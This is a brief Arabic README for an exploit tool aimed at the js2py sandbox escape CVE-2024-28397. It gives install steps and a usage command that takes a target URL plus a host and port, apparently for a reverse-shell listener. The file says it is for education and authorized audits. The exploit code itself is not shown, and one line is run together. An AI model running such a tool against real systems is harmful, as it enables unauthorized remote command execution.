
js2py <= 0.74 هروب من الصندوق الرملي (CVE-2024-28397)
أداة استغلال لتنفيذ الأوامر عن بُعد (RCE) عبر هروب من صندوق الرمل في js2py <= 0.74.
تسمح بتنفيذ كود تعسفي على النظام المضيف من خلال تقييم JavaScript غير آمن.
subprocess.Popenالتبعيات:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
هذا المشروع يُقدَّم لأغراض تعليمية فقط ولتدقيقات أمنية مصرح بها.
المؤلف غير مسؤول عن سوء استخدام هذه الأداة.